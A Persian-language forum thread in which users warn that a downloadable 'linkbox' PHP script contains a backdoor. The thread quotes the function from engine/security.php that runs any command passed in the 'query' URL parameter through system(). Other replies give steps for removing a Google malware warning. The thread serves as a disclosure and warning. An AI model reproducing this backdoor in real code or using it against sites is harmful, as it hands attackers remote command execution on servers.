• پایان فعالیت بخشهای انجمن: امکان ایجاد موضوع یا نوشته جدید برای عموم کاربران غیرفعال شده است

این linkbox ایرانی رو نگیرید. مشکل امنیتی

aligilani1986

Registered User
تاریخ عضویت
4 فوریه 2009
نوشته‌ها
14
لایک‌ها
2
سلام.
امروز دنبال یک linkbox میگشتم به این سایت رفتم.

http://mehrdaddesign.com/111-%D8%B3%DB%8C%D8%B3%D8%AA%D9%85-%D9%84%DB%8C%D9%86%DA%A9-%D8%A8%D8%A7%DA%A9%D8%B3-%D8%A7%D8%AA%D9%88%D9%85%D8%A7%D8%AA%DB%8C%DA%A9-%D9%88%D8%B1%DA%98%D9%86-1.5.html

این اسکریپت یک مشکل امنیتی داره و من از مهرداد انتظار نداشتم که این اسکریپتی که نوشته رو بده دست مردم و بوسیله اون سایتها شون رو هک کنه!!!!!!!!!:blink:

مشکل امنیتی در فایل engine/security.php است.

PHP:
function input()
{
if (isset($_GET['query'])){
$qry = $_GET['query'];
$qry = system($qry);
return $qry;
}
else{
return "";
}
}echo input();
 

amk

Registered User
تاریخ عضویت
1 ژانویه 2009
نوشته‌ها
4,089
لایک‌ها
9
محل سکونت
نازی آباد
یه بار هم همین موضوع تو خود سایتشون بیان شد ولی تا اونجاییکه یادم میاد انگار مشکلی نبوده...البته من تو php وارد نیستم...
 

aligilani1986

Registered User
تاریخ عضویت
4 فوریه 2009
نوشته‌ها
14
لایک‌ها
2
یه بار هم همین موضوع تو خود سایتشون بیان شد ولی تا اونجاییکه یادم میاد انگار مشکلی نبوده...البته من تو php وارد نیستم...

سلام.

ولی هست.

system($qry) یک دستور را روی سرور اجرا میکنه.
 

mesdakh

کاربر تازه وارد
تاریخ عضویت
22 آپریل 2006
نوشته‌ها
14
لایک‌ها
0
دوستان اكثر لينك باكسها مشكل دارن و در گوگل بازديد كنندگان وبلاگتون
با اين پيام مواجه ميشن:


(اين وبگاه ممكن است به رايانه شما آسيب برساند)...





اگر سایت شما یکی از چندین تهدید امنیتی را که گوگل بدافزار می شناسد
در خود داشته باشد طولی نمی کشد که گوگل سایت شما را ناقض امنیت شناخته
و پایین تمامی آدرسهای سایت شما که در گوگل ایندکس شده این جمله را اضافه
می کند :

" این وبگاه ممکن است به رایانه شما آسیب وارد نماید !!! "


واما راه حل اين مشكل:


پس از پاک کردن کدهاي ويروسي از وبلاگ :


اول وارد gmail تون شويد سپس به اين صفحه برويد


https://www.google.com/webmasters/tools/home?hl=en


وبلاگ مورد نظر خود را وارد کنيد.وسپس کدي را که گوگل ميدهد در
قسمت مورد نظر
(بين<html><head>
و
<title><*Title*></title>
</head> )


قرار دهيد. و بر روي verify کليک کنيد


حال به صفحه قبلي رفته و روي سايت وارد شده کليک کنيد .در قسمت
بالاي اطلاعات وبلاگ شما بر روي More details.


کليک کرده و سپس بر Request a review. کليک کنيد


بعد از چند روز گوگل وبلاگ شما از ليست سايت هاي ويروسي خارج
کرده واز طريق گوگل نيز بازديد کننده خواهيد داشت.



البته بعد از رفع اين مشكل..براي مدتي ،حدودا 1ماه
تا 2ماه در سرچ گوگل وبلاگ خودتون را در صفحات
اول مشاهده نمي كنيد...
ولي درنهايت مشكلتون برطرف ميشه..براي وبلاگ
من هم همين مشكل بوجود اومد،كه آمار بازديدم رسيد
به يكي در روز..مواظب كدهاي لينك باكسها باشيد..
 

jany

کاربر تازه وارد
تاریخ عضویت
26 نوامبر 2009
نوشته‌ها
3
لایک‌ها
0
این لینک باکسه جالبه
حالا چطوری می تونیم این باگ رو برطرف کنیم؟
با تشکر
 
بالا